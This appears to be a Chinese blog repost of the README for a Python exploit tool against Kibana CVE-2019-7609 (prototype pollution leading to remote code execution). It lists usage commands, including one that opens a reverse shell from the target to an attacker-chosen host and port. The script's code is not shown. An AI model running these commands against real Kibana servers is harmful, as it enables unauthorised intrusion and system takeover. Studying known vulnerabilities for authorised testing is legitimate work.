Kibana原型污染漏洞利用分析:CVE-2019-7609远程代码执行

本文详细分析了Kibana原型污染漏洞CVE-2019-7609的Python利用脚本,该漏洞影响6.6.1之前版本,可导致远程代码执行,包括反弹shell获取系统控制权。

https://sploitus.com/exploit?id=A3578A0A-2FCF-597A-96E4-702CAF51600A

Kibana

⚠️ 免责声明:

此脚本仅用于教育目的和授权的渗透测试。请勿在您不拥有或未获得明确测试权限的系统上使用。作者和贡献者不对因此工具造成的任何误用或损害负责。


🎯 这是什么?

这是一个针对Kibana版本**< 6.6.1远程代码执行漏洞**的Python 3利用脚本。它利用原型污染漏洞在易受攻击的Kibana实例上执行任意命令,包括生成反向shell。

🕹️ 功能特性

  • 自动检测Kibana版本
  • 验证漏洞状态
  • 可选触发反向shell到您的监听器
  • 清晰、交互式终端输出
  • 完全兼容Python 3

📚 参考资源

🚀 使用方法

1
python3 kibana_exploit.py -u http://target-kibana:5601

触发反向shell:

1
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

示例

1
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ 要求

  • Python 3.x
  • requests
  • packaging

使用以下命令安装依赖:

1
pip install requests packaging

🧩 工作原理

  • 通过HTTP请求检测Kibana版本
  • 验证目标是否易受CVE-2019-7609攻击
  • 利用原型污染执行任意命令
  • 可选生成反向shell到指定主机和端口

🎨 输出

该脚本为检测、验证和利用提供清晰的逐步输出,使其易于跟随且使用有趣!


👾 用于娱乐与学习

此脚本是学习原型污染、远程代码执行和渗透测试技术的绝佳方式。请负责任地使用,并始终获得许可!


📝 许可证

此项目仅用于教育用途。无担保,无保证。道德黑客,保持好奇,玩得开心!

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计